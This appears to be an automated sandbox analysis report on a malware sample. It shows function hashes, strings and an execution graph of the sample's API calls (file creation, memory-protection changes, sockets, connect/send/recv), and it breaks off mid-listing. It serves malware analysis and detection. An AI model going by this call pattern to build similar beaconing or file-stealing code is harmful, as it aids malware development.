                                                                                                                                            • Instruction ID: 4c074788e67ce2b7b16c418e69ca871c7d813a5d9afab6f91b78e7d52554ac0b
                                                                                                                                            • Opcode Fuzzy Hash: 3410d80ff92ec1eacc9767dd2e518846fccaf9f30d45084d70697770fd7d18bf
                                                                                                                                            • Instruction Fuzzy Hash: DD9002A170580403D24075984814607400597D0303F95C121A2064565ECA298E516236
                                                                                                                                            Function 01793010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 211dbc877c56520903d52056f62f79904a11300ba557e4d8b7ec953be7080f8f
                                                                                                                                            • Instruction ID: 628ee848a5d89f02b2a65e526496606fc9c1987c123040acc03b2949c67d4ba8
                                                                                                                                            • Opcode Fuzzy Hash: 211dbc877c56520903d52056f62f79904a11300ba557e4d8b7ec953be7080f8f
                                                                                                                                            • Instruction Fuzzy Hash: 2090026170584442D24072984814B0F810597E1203FD5C129A4156564CC9158A555722
                                                                                                                                            Function 01793090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8d19cce416a517c75058ddafa249031a64129ee07291f0beb9ad0f54451e0de1
                                                                                                                                            • Instruction ID: 016aa86c315eb5c2244925e3383d9012f2bcb9eae5fe841cb9361fbd2053c7dc
                                                                                                                                            • Opcode Fuzzy Hash: 8d19cce416a517c75058ddafa249031a64129ee07291f0beb9ad0f54451e0de1
                                                                                                                                            • Instruction Fuzzy Hash: 9690026174540802D240719884247074006D7D0602F95C121A0024564DC6168B6567B2
                                                                                                                                            Function 017935C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 36010156061bf2a531b62aa10bcda41c4cab07c443bea9354572eb4808fdfc1f
                                                                                                                                            • Instruction ID: e33ae652d243f1e406e2c3841a4ef2a58e73c8d31fd52d066be858c995339a0d
                                                                                                                                            • Opcode Fuzzy Hash: 36010156061bf2a531b62aa10bcda41c4cab07c443bea9354572eb4808fdfc1f
                                                                                                                                            • Instruction Fuzzy Hash: D4900271B0950402D20071984524706500597D0202FA5C521A0424578DC7958B5166A3
                                                                                                                                            Function 017939B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 24590df3c1c307dc8cf5dc6043c1f4d10a1a4588e291a3ad8d782aca316c5994
                                                                                                                                            • Instruction ID: c0254e563c88b586561ed452e77588a7d11821ad6a27b2067fd490e44ae6f1b4
                                                                                                                                            • Opcode Fuzzy Hash: 24590df3c1c307dc8cf5dc6043c1f4d10a1a4588e291a3ad8d782aca316c5994
                                                                                                                                            • Instruction Fuzzy Hash: D790026174945102D250719C44146168005B7E0202F95C131A08145A4DC5558A556322
                                                                                                                                            Function 01793D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9d7ea838df69cb2970d547cb0b589d43068045923be7bf714365fe28637e98ad
                                                                                                                                            • Instruction ID: 7ee0b55faade01c07b7abece1a3d60ff050aac754168dd56c3030bb0bf37c92c
                                                                                                                                            • Opcode Fuzzy Hash: 9d7ea838df69cb2970d547cb0b589d43068045923be7bf714365fe28637e98ad
                                                                                                                                            • Instruction Fuzzy Hash: 6590027570540402D61071985814646404697D0302F95D521A0424568DC6548AA1A222
                                                                                                                                            Function 01793D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4731c9a5a4ff7b3fd40cb62180214a635f139b7081d6d8a747006ac91dd5a9b6
                                                                                                                                            • Instruction ID: 8a387d0cb278b7a59420ccb01d78285a6c343c6b99fc545cdd61240ca2dde87d
                                                                                                                                            • Opcode Fuzzy Hash: 4731c9a5a4ff7b3fd40cb62180214a635f139b7081d6d8a747006ac91dd5a9b6
                                                                                                                                            • Instruction Fuzzy Hash: B790027170640142964072985814A4E810597E1303BD5D525A0015564CC9148A615322
                                                                                                                                            Function 01792C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                            • Instruction ID: fa9376724b00c89519a7349e6798e09faf839b7c8c5fc9ab9722fc27f25df295
                                                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            Function 01792890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: 78e2db9c7f437267284cd8a37d4892bf9f3b0c634bc2a883290707ad896f0bd5
                                                                                                                                            • Instruction ID: 1368904fa7df0c9c59621e202f9fb2d24d6e211d49302bf7c53bc7ac6bf202ce
                                                                                                                                            • Opcode Fuzzy Hash: 78e2db9c7f437267284cd8a37d4892bf9f3b0c634bc2a883290707ad896f0bd5
                                                                                                                                            • Instruction Fuzzy Hash: 0551F8B5A00116BFCF11EBAC989097EFBB8BB58241750C66DF4A5E7646E334DE0487E0
                                                                                                                                            Function 01802410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: 79c3e213ed8cc8ef64de90577ce0a249dd3158d8922bc034dfdb4e2f70e012be
                                                                                                                                            • Instruction ID: 42decd2b4ee401643f7d1b7f18f642fe30de0dbf71c0054a74b4d165c34d40c1
                                                                                                                                            • Opcode Fuzzy Hash: 79c3e213ed8cc8ef64de90577ce0a249dd3158d8922bc034dfdb4e2f70e012be
                                                                                                                                            • Instruction Fuzzy Hash: 0551F571A00649AFDBB2DE9CCC9487EFBFAAB44304B44885AF4D6D3681D6B4DB408760
                                                                                                                                            Function 01787630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017C46FC
                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017C4725
                                                                                                                                            • Execute=1, xrefs: 017C4713
                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017C4655
                                                                                                                                            • ExecuteOptions, xrefs: 017C46A0
                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017C4742
                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 017C4787
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                            • Opcode ID: 608f4860bb24e5f1561cea57a72ac0a734820cf479b421e58c77b915c41009aa
                                                                                                                                            • Instruction ID: ba0747b90d18e971e95c8cadc8a39acba36ee1602e309c38cad6c1f5db028cd9
                                                                                                                                            • Opcode Fuzzy Hash: 608f4860bb24e5f1561cea57a72ac0a734820cf479b421e58c77b915c41009aa
                                                                                                                                            • Instruction Fuzzy Hash: DA514931680209AAEF24BBA8DC99FADF7B8EF54714F2400DDD607A7181DB709A45CF50
                                                                                                                                            Function 0179B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction ID: 4c7194c1d456380d0e5ead6cd51b3ded6ceb8bc71830c12e651f4b397a3d3cd4
                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction Fuzzy Hash: D981B470E452499EEF25CE6CF891FFEFBB1AF85320F18425AD851A7291C7349848CB91
                                                                                                                                            Function 018020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                            • Opcode ID: 8f7c37b250b1cd22dd6ae60055f10c989e93271415ef01d0045e324cae30061e
                                                                                                                                            • Instruction ID: 429ad951548cb701bb3780f053ecedfd6df0a9e1147fee36faf21c3875ddd972
                                                                                                                                            • Opcode Fuzzy Hash: 8f7c37b250b1cd22dd6ae60055f10c989e93271415ef01d0045e324cae30061e
                                                                                                                                            • Instruction Fuzzy Hash: D221C47AA0011DABDB11DF79DC48AFEBBF9EF54744F040116E905E3240E770EA058BA0
                                                                                                                                            Function 0177F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017C02BD
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017C031E
                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017C02E7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                            • Opcode ID: 8db27ec4f46a90249cbc27c661f3ebc431617ef39db9fe450b54e866890aea80
                                                                                                                                            • Instruction ID: 063fd0e2aa454e1f196c11349cab50a23189f8f61b19a81e8687da3cef7fc3cd
                                                                                                                                            • Opcode Fuzzy Hash: 8db27ec4f46a90249cbc27c661f3ebc431617ef39db9fe450b54e866890aea80
                                                                                                                                            • Instruction Fuzzy Hash: D6E19B34608741DFDB25CF28C984B2AFBE1AB88714F140A6DF5A5CB2E1D774D945CB82
                                                                                                                                            Function 0178BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017C7B7F
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017C7BAC
                                                                                                                                            • RTL: Resource at %p, xrefs: 017C7B8E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                            • Opcode ID: 8da1b0ceb66b5c665e454848f95631200ad617ac7b89188b0e4f918e012735c0
                                                                                                                                            • Instruction ID: 52bee0a8b113f8f93bde69bacdaefc22ed02843a41e568eb44b680ee27f2b4d3
                                                                                                                                            • Opcode Fuzzy Hash: 8da1b0ceb66b5c665e454848f95631200ad617ac7b89188b0e4f918e012735c0
                                                                                                                                            • Instruction Fuzzy Hash: 5841EF353447029FDB25EE29C840B6AF7E5EF98720F000A1DFA5ADB680DB31E9058B91
                                                                                                                                            Function 0178B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C728C
                                                                                                                                            Strings
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017C72C1
                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017C7294
                                                                                                                                            • RTL: Resource at %p, xrefs: 017C72A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                            • Opcode ID: ba666591a50be3dd431084d67fc7abb87601fc8e2e80f9dc8cc5cab39a73a7cd
                                                                                                                                            • Instruction ID: 668dbef2925aa31adf31b0a247efe92ca5cc607ffd578cc5c3cb2ffc8d473363
                                                                                                                                            • Opcode Fuzzy Hash: ba666591a50be3dd431084d67fc7abb87601fc8e2e80f9dc8cc5cab39a73a7cd
                                                                                                                                            • Instruction Fuzzy Hash: 55410231744606ABD724DE29CC42B6AF7B6FB94B10F14061DF955EB240DB30F8468BD1
                                                                                                                                            Function 01802300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                            • Opcode ID: a1635ad7e15fe768dccf8f7ef1a68d2fc59ebf26c6caa463fb4bff177139b60b
                                                                                                                                            • Instruction ID: 4ca09f22ce961bfe357286ff336665ce48539deee557fbbe7a0ef5c9f6dda216
                                                                                                                                            • Opcode Fuzzy Hash: a1635ad7e15fe768dccf8f7ef1a68d2fc59ebf26c6caa463fb4bff177139b60b
                                                                                                                                            • Instruction Fuzzy Hash: 7931A472A0022D9FDB61DF2DCC44BEEB7F9EB44710F454556E949E3280EB709A448BA0
                                                                                                                                            Function 01797D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction ID: 6daf029417db4812a51f1a3664917e2e9d57fe2c690d889fa1fb5d8afc1da3c8
                                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction Fuzzy Hash: 9391C671E1020A9BEF28CF6DE8816BEFBB2EF44720F54451AE955E72C0D73089498F11
                                                                                                                                            Function 01759126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$@
                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                            • Opcode ID: 74ed01424ec444d5b00a30a998c391f5bf82b0360fcaea84facb5aa5da8ddf90
                                                                                                                                            • Instruction ID: ddb1d3d7299df6cf5db95c493d1b3f9be493e460dcce8e8df1d783f002dc1529
                                                                                                                                            • Opcode Fuzzy Hash: 74ed01424ec444d5b00a30a998c391f5bf82b0360fcaea84facb5aa5da8ddf90
                                                                                                                                            • Instruction Fuzzy Hash: 43811B71D012699BDB718B54CC44BEEBBB8AF48754F0041DAEA19B7640E7705E84CFA0

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:2.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:4.7%
                                                                                                                                            Total number of Nodes:444
                                                                                                                                            Total number of Limit Nodes:15
                                                                                                                                            execution_graph 13893 10dbbdd9 13894 10dbbdf0 13893->13894 13895 10dbf382 ObtainUserAgentString 13894->13895 13896 10dbbecd 13894->13896 13895->13896 13857 10dc5a1f 13858 10dc5a25 13857->13858 13861 10db95f2 13858->13861 13860 10dc5a3d 13862 10db95fb 13861->13862 13863 10db960e 13861->13863 13862->13863 13864 10dbe662 6 API calls 13862->13864 13863->13860 13864->13863 13631 10db82dd 13635 10db831a 13631->13635 13632 10db83fa 13633 10db8328 SleepEx 13633->13633 13633->13635 13635->13632 13635->13633 13638 10dc2f12 13635->13638 13647 10db9432 13635->13647 13657 10db80f2 13635->13657 13642 10dc2f48 13638->13642 13639 10dc3134 13639->13635 13640 10dc3232 NtCreateFile 13640->13642 13641 10dc30e9 13644 10dc3125 13641->13644 13675 10dc2842 13641->13675 13642->13639 13642->13640 13642->13641 13663 10dc3f82 13642->13663 13683 10dc2922 13644->13683 13648 10db945b 13647->13648 13656 10db94c9 13647->13656 13649 10dc3232 NtCreateFile 13648->13649 13648->13656 13650 10db9496 13649->13650 13651 10db94c5 13650->13651 13704 10db9082 13650->13704 13653 10dc3232 NtCreateFile 13651->13653 13651->13656 13653->13656 13654 10db94b6 13654->13651 13713 10db8f52 13654->13713 13656->13635 13658 10db8109 13657->13658 13660 10db81d3 13657->13660 13718 10db8012 13658->13718 13660->13635 13661 10db8113 13661->13660 13662 10dc3f82 6 API calls 13661->13662 13662->13660 13664 10dc3fb8 13663->13664 13667 10dc4081 13664->13667 13671 10dc4022 13664->13671 13691 10dc05b2 13664->13691 13666 10dc4134 13670 10dc41b2 13666->13670 13666->13671 13694 10dc0732 13666->13694 13667->13666 13669 10dc4117 getaddrinfo 13667->13669 13667->13671 13669->13666 13670->13671 13697 10dc06b2 13670->13697 13671->13642 13673 10dc47f4 setsockopt recv 13673->13671 13674 10dc4729 13674->13671 13674->13673 13676 10dc286d 13675->13676 13700 10dc3232 13676->13700 13678 10dc2906 13678->13641 13679 10dc2888 13679->13678 13680 10dc3f82 6 API calls 13679->13680 13681 10dc28c5 13679->13681 13680->13681 13681->13678 13682 10dc3232 NtCreateFile 13681->13682 13682->13678 13684 10dc29c2 13683->13684 13685 10dc3232 NtCreateFile 13684->13685 13686 10dc29d6 13685->13686 13687 10dc2a9f 13686->13687 13688 10dc2a5d 13686->13688 13690 10dc3f82 6 API calls 13686->13690 13687->13639 13688->13687 13689 10dc3232 NtCreateFile 13688->13689 13689->13687 13690->13688 13692 10dc05ec 13691->13692 13693 10dc060a socket 13691->13693 13692->13693 13693->13667 13695 10dc0788 connect 13694->13695 13696 10dc076a 13694->13696 13695->13670 13696->13695 13698 10dc0705 send 13697->13698 13699 10dc06e7 13697->13699 13698->13674 13699->13698 13701 10dc325c 13700->13701 13703 10dc3334 13700->13703 13702 10dc3410 NtCreateFile 13701->13702 13701->13703 13702->13703 13703->13679 13705 10db9420 13704->13705 13706 10db90aa 13704->13706 13705->13654 13706->13705 13707 10dc3232 NtCreateFile 13706->13707 13708 10db91f9 13707->13708 13709 10dc3232 NtCreateFile 13708->13709 13712 10db93df 13708->13712 13710 10db93c9 13709->13710 13711 10dc3232 NtCreateFile 13710->13711 13711->13712 13712->13654 13714 10db8f70 13713->13714 13715 10db8f84 13713->13715 13714->13651 13716 10dc3232 NtCreateFile 13715->13716 13717 10db9046 13716->13717 13717->13651 13720 10db8031 13718->13720 13719 10db80cd 13719->13661 13720->13719 13721 10dc3f82 6 API calls 13720->13721 13721->13719 13746 10dbbedd 13748 10dbbf06 13746->13748 13747 10dbbfa4 13748->13747 13749 10db88f2 NtProtectVirtualMemory 13748->13749 13750 10dbbf9c 13749->13750 13751 10dbf382 ObtainUserAgentString 13750->13751 13751->13747 13865 10db9613 13866 10db9620 13865->13866 13867 10db9684 13866->13867 13868 10dc4e12 NtProtectVirtualMemory 13866->13868 13868->13866 13726 10dc4e12 13727 10dc3942 13726->13727 13728 10dc4e45 NtProtectVirtualMemory 13727->13728 13729 10dc4e70 13728->13729 13752 10dbdcd4 13754 10dbdcd8 13752->13754 13753 10dbe022 13754->13753 13758 10dbd352 13754->13758 13756 10dbdf0d 13756->13753 13767 10dbd792 13756->13767 13760 10dbd39e 13758->13760 13759 10dbd58e 13759->13756 13760->13759 13761 10dbd4ec 13760->13761 13763 10dbd595 13760->13763 13762 10dc3232 NtCreateFile 13761->13762 13765 10dbd4ff 13762->13765 13763->13759 13764 10dc3232 NtCreateFile 13763->13764 13764->13759 13765->13759 13766 10dc3232 NtCreateFile 13765->13766 13766->13759 13768 10dbd7e0 13767->13768 13769 10dc3232 NtCreateFile 13768->13769 13771 10dbd90c 13769->13771 13770 10dbdaf3 13770->13756 13771->13770 13772 10dbd352 NtCreateFile 13771->13772 13773 10dbd602 NtCreateFile 13771->13773 13772->13771 13773->13771 13838 10dc5a4d 13839 10dc5a53 13838->13839 13842 10db9782 13839->13842 13841 10dc5a6b 13844 10db978f 13842->13844 13843 10db97ad 13843->13841 13844->13843 13846 10dbe662 13844->13846 13847 10dbe66b 13846->13847 13853 10dbe7ba 13846->13853 13848 10db80f2 6 API calls 13847->13848 13847->13853 13850 10dbe6ee 13848->13850 13849 10dbe750 13852 10dbe83f 13849->13852 13849->13853 13855 10dbe791 13849->13855 13850->13849 13851 10dc3f82 6 API calls 13850->13851 13851->13849 13852->13853 13854 10dc3f82 6 API calls 13852->13854 13853->13843 13854->13853 13855->13853 13856 10dc3f82 6 API calls 13855->13856 13856->13853 13938 10dbd14a 13939 10dbd153 13938->13939 13944 10dbd174 13938->13944 13941 10dbf382 ObtainUserAgentString 13939->13941 13940 10dbd1e7 13942 10dbd16c 13941->13942 13943 10db80f2 6 API calls 13942->13943 13943->13944 13944->13940 13946 10db81f2 13944->13946 13947 10db820f 13946->13947 13948 10db82c9 13946->13948 13949 10dc2f12 7 API calls 13947->13949 13951 10db8242 13947->13951 13948->13944 13949->13951 13950 10db8289 13950->13948 13953 10db80f2 6 API calls 13950->13953 13951->13950 13952 10db9432 NtCreateFile 13951->13952 13952->13950 13953->13948 13869 10dc4e0a 13870 10dc4e45 NtProtectVirtualMemory 13869->13870 13871 10dc3942 13869->13871 13872 10dc4e70 13870->13872 13871->13870 13734 10dc3f82 13735 10dc3fb8 13734->13735 13736 10dc05b2 socket 13735->13736 13738 10dc4081 13735->13738 13742 10dc4022 13735->13742 13736->13738 13737 10dc4134 13739 10dc0732 connect 13737->13739 13741 